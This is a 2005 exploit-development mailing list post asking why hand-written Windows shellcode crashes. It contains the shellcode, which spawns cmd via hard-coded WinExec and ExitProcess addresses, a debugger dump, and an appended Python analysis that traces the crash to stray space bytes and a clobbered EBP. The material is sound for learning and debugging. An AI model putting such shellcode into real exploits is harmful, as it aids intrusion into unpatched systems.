Vulnerability Development mailing list archives
problem to exploit a stack overflow
From: migalo digalo <l.epsilon () gmail com>
Date: Tue, 24 May 2005 14:09:56 +0000
hi all,

ok, i tested many tests with shell that has no 0xcc and 0xc9 ... i decided to test it with my own shellcode (a very simple one):

    unsigned char shellcode[] =
        "\xC6\x45\xFC\x63"      /* mov byte ptr [ebp-4],63h */
        "\xC6\x45\xFD\x6D"      /* mov byte ptr [ebp-3],6Dh */
        "\xC6\x45\xFE\x64"      /* mov byte ptr [ebp-2],64h */
        "\x33\xC0"              /* xor eax,eax */
        "\x50"                  /* push eax */
        "\x6A\x01 "             /* push 1  (the literal ends with a space character) */
        "\x8D\x45\xFC "         /* lea eax,[ebp-4]  (the literal ends with a space character) */
        "\x50"                  /* push eax */
        "\xB8\x4D\x11\x86\x7C"  /* mov eax,0x7c86114d (WinExec) */
        "\xFF\xD0"              /* call eax */
        "\x6A\x01"              /* push 1 */
        "\xB8\xA2\xCA\x81\x7C"  /* mov eax,0x7c81caa2 (ExitProcess) */
        "\xFF\xD0";             /* call eax */

and a debug session gives me that:

    0012FF34  C6 45 FC 63         mov byte ptr [ebp-4],63h
    0012FF38  C6 45 FD 6D         mov byte ptr [ebp-3],6Dh
    0012FF3C  C6 45 FE 64         mov byte ptr [ebp-2],64h
    0012FF40  33 C0               xor eax,eax
    0012FF42  50                  push eax
    0012FF43  6A 01               push 1
    0012FF45  20 8D 45 FC 20 50   and byte ptr [ebp+5020FC45h],cl
    0012FF4B  B8 4D 11 86 7C      mov eax,7C86114Dh
    0012FF50  FF D0               call eax
    0012FF52  6A 01               push 1
    0012FF54  B8 A2 CA 81 7C      mov eax,7C81CAA2h
    0012FF59  FF D0               call eax
    0012FF5B  90                  nop

    EAX = 00000001  EBX = 7FFD9000  ECX = 00423AA8  EDX = 00000000
    ESI = 00000000  EDI = 0012FF80  EIP = 0012FF34  ESP = 0012FF34
    EBP = 90909090  EFL = 00000246
    CS = 001B  DS = 0023  ES = 0023  SS = 0023  FS = 003B  GS = 0000
    OV=0 UP=0 EI=1 PL=0 ZR=1 AC=0 PE=1 CY=0
    9090908C = ??
    ST0 = +0.00000000000000000e+0000  ST1 = +0.00000000000000000e+0000
    ST2 = +0.00000000000000000e+0000  ST3 = +0.00000000000000000e+0000
    ST4 = +0.00000000000000000e+0000  ST5 = +0.00000000000000000e+0000
    ST6 = +0.00000000000000000e+0000  ST7 = +0.00000000000000000e+0000
    CTRL = 027F  STAT = 0000  TAGS = FFFF
    EIP = 00000000  CS = 0000  DS = 0000  EDO = 00000000

so the access violation happened (this time) at the beginning of the shellcode !!!? is that a security feature in xp sp2? or something else? can someone help me to understand this. thank you
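The debugger output in the post already holds the two facts that matter: at 0012FF45 the bytes 20 8D 45 FC 20 50 contain two 0x20 bytes that no \x escape produced (the trailing spaces inside "\x6A\x01 " and "\x8D\x45\xFC " are real string bytes), and the register dump shows EBP = 90909090, so the very first mov byte ptr [ebp-4] writes to 9090908C, the address the debugger marks "??". The Python below is an added example, not code from the post or the list, that checks both mechanically: it decodes the literal, compares the escapes-only bytes with the listing, and computes the first store's target. The POSTED_* constants are constructed copies of the post's data.

```python
import re

# Constructed copies of the literal and the debugger listing from the post. The two
# spaces inside the quotes are kept: in a C string literal they are real 0x20 bytes.
POSTED_LITERAL = r'''"\xC6\x45\xFC\x63" "\xC6\x45\xFD\x6D" "\xC6\x45\xFE\x64" "\x33\xC0"
"\x50" "\x6A\x01 " "\x8D\x45\xFC " "\x50" "\xB8\x4D\x11\x86\x7C" "\xFF\xD0" "\x6A\x01"
"\xB8\xA2\xCA\x81\x7C" "\xFF\xD0"'''
POSTED_LISTING = """0012FF34 C6 45 FC 63 mov byte ptr [ebp-4],63h
0012FF38 C6 45 FD 6D mov byte ptr [ebp-3],6Dh
0012FF3C C6 45 FE 64 mov byte ptr [ebp-2],64h
0012FF40 33 C0 xor eax,eax
0012FF42 50 push eax
0012FF43 6A 01 push 1
0012FF45 20 8D 45 FC 20 50 and byte ptr [ebp+5020FC45h],cl
0012FF4B B8 4D 11 86 7C mov eax,7C86114Dh
0012FF50 FF D0 call eax
0012FF52 6A 01 push 1
0012FF54 B8 A2 CA 81 7C mov eax,7C81CAA2h
0012FF59 FF D0 call eax"""

def literal_bytes(src):
    """Decode concatenated C string literals into (emitted bytes, stray), where stray
    lists (offset, byte) for every character that was not a \\xHH escape."""
    out, stray = bytearray(), []
    for piece in re.findall(r'"([^"]*)"', src):
        for tok in re.findall(r'\\x[0-9A-Fa-f]{2}|.', piece):
            if not tok.startswith('\\x'):          # plain character: a byte nobody spelled out
                stray.append((len(out), ord(tok)))
            out.append(int(tok[2:], 16) if tok.startswith('\\x') else ord(tok))
    return bytes(out), stray

def listing_bytes(listing):
    """Collect the opcode bytes from 'ADDRESS HH HH ... mnemonic' listing lines."""
    hexcols = re.findall(r'^[0-9A-F]{8}((?:\s[0-9A-F]{2})+)\s', listing, re.M)
    return b''.join(bytes.fromhex(h) for h in hexcols)

def ebp_store_target(code, ebp):
    """Address written by 'C6 45 disp8 imm8' (mov byte ptr [ebp+disp8], imm8): ModRM 45h
    addresses relative to EBP, so the target depends entirely on what EBP holds."""
    assert code[:2] == b'\xC6\x45', 'not mov byte ptr [ebp+disp8], imm8'
    return (ebp + int.from_bytes(code[2:3], 'little', signed=True)) & 0xFFFFFFFF

def diagnose(literal=POSTED_LITERAL, listing=POSTED_LISTING, ebp=0x90909090):
    """Return (stray bytes, first offset where escapes-only bytes and debugger bytes
    differ or None, address the first store writes with the given EBP)."""
    emitted, stray = literal_bytes(literal)
    intended = bytes(b for i, b in enumerate(emitted) if i not in dict(stray))
    seen = listing_bytes(listing)
    diff = next((i for i, (x, y) in enumerate(zip(intended, seen)) if x != y), None)
    return stray, diff, ebp_store_target(seen, ebp)
```

diagnose() returns the two stray 0x20 bytes at offsets 17 and 21, offset 17 as the first point where the debugger's bytes stop matching the escapes alone, and 0x9090908C as the first store's target.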
Current thread:
- problem to exploit a stack overflow migalo digalo (May 23)
- Re: problem to exploit a stack overflow Valdis . Kletnieks (May 25)
- <Possible follow-ups>
- problem to exploit a stack overflow migalo digalo (May 25)
- Re: problem to exploit a stack overflow Daniele Milan (May 25)
- Re: problem to exploit a stack overflow 6d79676d61696c6163636f756e74 (May 25)